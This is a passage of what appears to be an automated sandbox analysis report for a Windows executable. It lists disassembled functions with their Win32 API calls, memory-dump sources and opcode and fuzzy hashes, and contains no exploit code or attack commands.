                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3368777196-0
                                                      • Opcode ID: abbee473b9e345ebafd96a24acfe70d6a678468dd15708e9bd0094bf4381a3ca
                                                      • Instruction ID: 9d44ca4435cf5ef65b51ac088983c83afe7592f5d4c9e1b27c76ce43d67181bc
                                                      • Opcode Fuzzy Hash: abbee473b9e345ebafd96a24acfe70d6a678468dd15708e9bd0094bf4381a3ca
                                                      • Instruction Fuzzy Hash: 78419A31900205EFDF04AF54DC85AAAB7B8FF48310F1440A9ED04AE296DB31EE65CBA4
                                                      APIs
                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00E8F3AB,00000000,?,?,00000000,?,00E8682C,00000004,00000000,00000000), ref: 00EC824C
                                                      • EnableWindow.USER32(00000000,00000000), ref: 00EC8272
                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00EC82D1
                                                      • ShowWindow.USER32(00000000,00000004), ref: 00EC82E5
                                                      • EnableWindow.USER32(00000000,00000001), ref: 00EC830B
                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00EC832F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$Enable$MessageSend
                                                      • String ID:
                                                      • API String ID: 642888154-0
                                                      • Opcode ID: 11443f68715e13636f9934e2343d4cd9eea4fbe772bf1572712f7948f2f56087
                                                      • Instruction ID: 7a61062553431b7de82c0166eae931c9c5d11e235ec43ac87e5d85790a953b7b
                                                      • Opcode Fuzzy Hash: 11443f68715e13636f9934e2343d4cd9eea4fbe772bf1572712f7948f2f56087
                                                      • Instruction Fuzzy Hash: 50418334601644EFDB15CF25CB99FA47BE0FB0A718F18616DE5486B272CB33A846CB50
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 00E94C95
                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E94CB2
                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E94CEA
                                                      • _wcslen.LIBCMT ref: 00E94D08
                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E94D10
                                                      • _wcsstr.LIBVCRUNTIME ref: 00E94D1A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                      • String ID:
                                                      • API String ID: 72514467-0
                                                      • Opcode ID: 396a64e4a960ae33cc56fd73ff67ae6ba356fed0b4d9346fe617f9ac8149b085
                                                      • Instruction ID: 586563ff742310c00086866242e6e9a875406ac5b700dde1517bac0970a7933e
                                                      • Opcode Fuzzy Hash: 396a64e4a960ae33cc56fd73ff67ae6ba356fed0b4d9346fe617f9ac8149b085
                                                      • Instruction Fuzzy Hash: 392129B52042007FEF155B35AD09E7B7BDCDF45B54F105039F809EA1D1EA61DC0282A1
                                                      APIs
                                                        • Part of subcall function 00E33AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E33A97,?,?,00E32E7F,?,?,?,00000000), ref: 00E33AC2
                                                      • _wcslen.LIBCMT ref: 00EA587B
                                                      • CoInitialize.OLE32(00000000), ref: 00EA5995
                                                      • CoCreateInstance.OLE32(00ECFCF8,00000000,00000001,00ECFB68,?), ref: 00EA59AE
                                                      • CoUninitialize.OLE32 ref: 00EA59CC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                      • String ID: .lnk
                                                      • API String ID: 3172280962-24824748
                                                      • Opcode ID: 0256bde76ebb080b66ab32e933f08560ee28637499d46b49918191f1560abb04
                                                      • Instruction ID: 5199cd9027dd70fa7e937d15d2f27f159c29fa245531f5b2b429bcdffcf926f5
                                                      • Opcode Fuzzy Hash: 0256bde76ebb080b66ab32e933f08560ee28637499d46b49918191f1560abb04
                                                      • Instruction Fuzzy Hash: 0ED174766087019FC714DF25C484A2ABBE2FF8A714F14985DF889AB361DB31EC45CB92
                                                      APIs
                                                        • Part of subcall function 00E90FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E90FCA
                                                        • Part of subcall function 00E90FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E90FD6
                                                        • Part of subcall function 00E90FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E90FE5
                                                        • Part of subcall function 00E90FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E90FEC
                                                        • Part of subcall function 00E90FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E91002
                                                      • GetLengthSid.ADVAPI32(?,00000000,00E91335), ref: 00E917AE
                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E917BA
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00E917C1
                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E917DA
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00E91335), ref: 00E917EE
                                                      • HeapFree.KERNEL32(00000000), ref: 00E917F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                      • String ID:
                                                      • API String ID: 3008561057-0
                                                      • Opcode ID: 5c979a85dbdaecd456216af2fb9d24d2592086636eca9f0fd56e0a641485b81e
                                                      • Instruction ID: b05ea7ca30c4fd50e150e7aee1d789ed10a429cbf624849bb245ec4b383b5e18
                                                      • Opcode Fuzzy Hash: 5c979a85dbdaecd456216af2fb9d24d2592086636eca9f0fd56e0a641485b81e
                                                      • Instruction Fuzzy Hash: E811AC32605206FFDF109FA6CC49FAE7BB9EB42359F244069F445B7220C736A945CB60
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E914FF
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00E91506
                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E91515
                                                      • CloseHandle.KERNEL32(00000004), ref: 00E91520
                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E9154F
                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00E91563
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                      • String ID:
                                                      • API String ID: 1413079979-0
                                                      • Opcode ID: 8b2df1a46d3bf8c63919fcc0044983480a553f41a3a637c8c1181f683d9672f0
                                                      • Instruction ID: 3a0db22b74ba379187766778a039d54e52c8e2c1a42980c9975144d86ed3a1f8
                                                      • Opcode Fuzzy Hash: 8b2df1a46d3bf8c63919fcc0044983480a553f41a3a637c8c1181f683d9672f0
                                                      • Instruction Fuzzy Hash: 21114A7250020AAFDF118FA8DD49FDE7BA9FB48748F154065FA05B2060C3768E659B60
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00E53379,00E52FE5), ref: 00E53390
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E5339E
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E533B7
                                                      • SetLastError.KERNEL32(00000000,?,00E53379,00E52FE5), ref: 00E53409
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: e6dbbf786bea74411e81dc5e6ef647d0744eef419fda69647360c2d3579b857e
                                                      • Instruction ID: 17b772a1560e8816307b53a2fef1110cc0e7ef9983b665f5dcbacec0a63388f3
                                                      • Opcode Fuzzy Hash: e6dbbf786bea74411e81dc5e6ef647d0744eef419fda69647360c2d3579b857e
                                                      • Instruction Fuzzy Hash: B8016832608311BEE61527757C819A62A84DB413FF330263DFD20B51F0EF514D0F9148
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00E65686,00E73CD6,?,00000000,?,00E65B6A,?,?,?,?,?,00E5E6D1,?,00EF8A48), ref: 00E62D78
                                                      • _free.LIBCMT ref: 00E62DAB
                                                      • _free.LIBCMT ref: 00E62DD3
                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,00E5E6D1,?,00EF8A48,00000010,00E34F4A,?,?,00000000,00E73CD6), ref: 00E62DE0
                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,00E5E6D1,?,00EF8A48,00000010,00E34F4A,?,?,00000000,00E73CD6), ref: 00E62DEC
                                                      • _abort.LIBCMT ref: 00E62DF2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free$_abort
                                                      • String ID:
                                                      • API String ID: 3160817290-0
                                                      • Opcode ID: a5984ee8e0a24144333e4e5b3602a4519df58d095c6033e3d8179e32b11b0320
                                                      • Instruction ID: 782a2eb45af4f8b51dfc58387f8f3fda7b654bb72a738c9b0e23114148d03bad
                                                      • Opcode Fuzzy Hash: a5984ee8e0a24144333e4e5b3602a4519df58d095c6033e3d8179e32b11b0320
                                                      • Instruction Fuzzy Hash: 38F0CD315C5E012BC2122739BC16E5E1599AFC17E5F35241CFA28B21D1DF258C065260
                                                      APIs
                                                        • Part of subcall function 00E49639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E49693
                                                        • Part of subcall function 00E49639: SelectObject.GDI32(?,00000000), ref: 00E496A2
                                                        • Part of subcall function 00E49639: BeginPath.GDI32(?), ref: 00E496B9
                                                        • Part of subcall function 00E49639: SelectObject.GDI32(?,00000000), ref: 00E496E2
                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00EC8A4E
                                                      • LineTo.GDI32(?,00000003,00000000), ref: 00EC8A62
                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00EC8A70
                                                      • LineTo.GDI32(?,00000000,00000003), ref: 00EC8A80
                                                      • EndPath.GDI32(?), ref: 00EC8A90
                                                      • StrokePath.GDI32(?), ref: 00EC8AA0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                      • String ID:
                                                      • API String ID: 43455801-0
                                                      • Opcode ID: b1b257498af01b67f7f982db335862763baa99af260f8780e00f769d508e894e
                                                      • Instruction ID: 2776b670ef6f41380dcd0ec9ff0ae81a2e469e67e65378cd6d4ac0bff98bf58a
                                                      • Opcode Fuzzy Hash: b1b257498af01b67f7f982db335862763baa99af260f8780e00f769d508e894e
                                                      • Instruction Fuzzy Hash: EF11397200010CFFDB129F91DC88EAA7F6CEB08354F008026FA49AA1A1C7729D56DFA0
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 00E95218
                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E95229
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E95230
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00E95238
                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E9524F
                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00E95261
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CapsDevice$Release
                                                      • String ID:
                                                      • API String ID: 1035833867-0
                                                      • Opcode ID: 928bd6b962fb8a5880fb4d840a3deb74040ee20aac4eb9c57a8a94e792354e34
                                                      • Instruction ID: c25ee15c4d86797a935f4a2e1839ad87292b48ec4c48835700159e196f389af9
                                                      • Opcode Fuzzy Hash: 928bd6b962fb8a5880fb4d840a3deb74040ee20aac4eb9c57a8a94e792354e34
                                                      • Instruction Fuzzy Hash: E5018475A01B04BFEF105BA69C49E4EBFB8EB44751F144066FA08B7390D6719805CBA0
                                                      APIs
                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E31BF4
                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E31BFC
                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E31C07
                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E31C12
                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E31C1A
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E31C22
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Virtual
                                                      • String ID:
                                                      • API String ID: 4278518827-0
                                                      • Opcode ID: 39c384275fc3caefc3e5eb46b202ae5a27697c09b80fa9dde2004be7ec0119a0
                                                      • Instruction ID: 44f7e68481842899474b5a5d31b0891679cc914349d2fe26949322aa7bf2d4fc
                                                      • Opcode Fuzzy Hash: 39c384275fc3caefc3e5eb46b202ae5a27697c09b80fa9dde2004be7ec0119a0
                                                      • Instruction Fuzzy Hash: B7016CB09027597DE3008F5A8C85B52FFA8FF19754F00411BD15C47A41C7F5A864CBE5
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E9EB30
                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E9EB46
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00E9EB55
                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E9EB64
                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E9EB6E
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E9EB75
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 839392675-0
                                                      • Opcode ID: 73e6650a02580f198dfab94c6325e628ebfeea2a66d32a553362ed2eba72307c
                                                      • Instruction ID: a4017b9f6456160da27a217bd466339b80eb1aacf0e0ed8a0fb6decf93163d37
                                                      • Opcode Fuzzy Hash: 73e6650a02580f198dfab94c6325e628ebfeea2a66d32a553362ed2eba72307c
                                                      • Instruction Fuzzy Hash: 98F09A72601158BFE7205B639C0EEEF3A7CEFCAF15F100168F605E1090E7A21A06C6B5
                                                      APIs
                                                      • GetClientRect.USER32(?), ref: 00E87452
                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00E87469
                                                      • GetWindowDC.USER32(?), ref: 00E87475
                                                      • GetPixel.GDI32(00000000,?,?), ref: 00E87484
                                                      • ReleaseDC.USER32(?,00000000), ref: 00E87496
                                                      • GetSysColor.USER32(00000005), ref: 00E874B0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                      • String ID:
                                                      • API String ID: 272304278-0
                                                      • Opcode ID: d407f3f0fc91cf9173c6e3433a3118b03c9456e8f63d35de1e1bce6adf0547ad
                                                      • Instruction ID: e5435bc343f2956f31ef2d4ae2248fb5aeaf291a30677c7b40d2bd39d850f579
                                                      • Opcode Fuzzy Hash: d407f3f0fc91cf9173c6e3433a3118b03c9456e8f63d35de1e1bce6adf0547ad
                                                      • Instruction Fuzzy Hash: AC018B31400215EFDB10AFA5DC08FEA7BB5FB04311F240060FD6DB21A1CB321E46AB51
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E9187F
                                                      • UnloadUserProfile.USERENV(?,?), ref: 00E9188B
                                                      • CloseHandle.KERNEL32(?), ref: 00E91894
                                                      • CloseHandle.KERNEL32(?), ref: 00E9189C
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00E918A5
                                                      • HeapFree.KERNEL32(00000000), ref: 00E918AC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                      • String ID:
                                                      • API String ID: 146765662-0
                                                      • Opcode ID: 9d327459e92336cf49fb4311cdc79806c61b8b0b65f2a73b00b371ab59c9f816
                                                      • Instruction ID: 4ea46741e674fd5d9ecba58dcd9816b1340003afa6d7c686b71a97e210c99fe7
                                                      • Opcode Fuzzy Hash: 9d327459e92336cf49fb4311cdc79806c61b8b0b65f2a73b00b371ab59c9f816
                                                      • Instruction Fuzzy Hash: 68E0C236404501BFDB015BA7ED0CD0ABB39FB49B22B208231F229A1471CB339466DB50
                                                      APIs
                                                        • Part of subcall function 00E50242: EnterCriticalSection.KERNEL32(00F0070C,00F01884,?,?,00E4198B,00F02518,?,?,?,00E312F9,00000000), ref: 00E5024D
                                                        • Part of subcall function 00E50242: LeaveCriticalSection.KERNEL32(00F0070C,?,00E4198B,00F02518,?,?,?,00E312F9,00000000), ref: 00E5028A
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                        • Part of subcall function 00E500A3: __onexit.LIBCMT ref: 00E500A9
                                                      • __Init_thread_footer.LIBCMT ref: 00EB7BFB
                                                        • Part of subcall function 00E501F8: EnterCriticalSection.KERNEL32(00F0070C,?,?,00E48747,00F02514), ref: 00E50202
                                                        • Part of subcall function 00E501F8: LeaveCriticalSection.KERNEL32(00F0070C,?,00E48747,00F02514), ref: 00E50235
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                      • String ID: +T$5$G$Variable must be of type 'Object'.
                                                      • API String ID: 535116098-4125810065
                                                      • Opcode ID: eba2d0e2f8e4562f04ab2fac8189c03c558312b74392e315393daa82ab2acb10
                                                      • Instruction ID: 804eb39618a16963ac8f2170361afa1b72c6e6229e98a5b670ffd924957fd6ba
                                                      • Opcode Fuzzy Hash: eba2d0e2f8e4562f04ab2fac8189c03c558312b74392e315393daa82ab2acb10
                                                      • Instruction Fuzzy Hash: E291AC70A04209AFCB14EF54D881DEEBBB1BF89304F14905DF886BB692DB31AE41DB51
                                                      APIs
                                                        • Part of subcall function 00E37620: _wcslen.LIBCMT ref: 00E37625
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E9C6EE
                                                      • _wcslen.LIBCMT ref: 00E9C735
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E9C79C
                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E9C7CA
                                                      Strings
                                                      Memory Dump Source
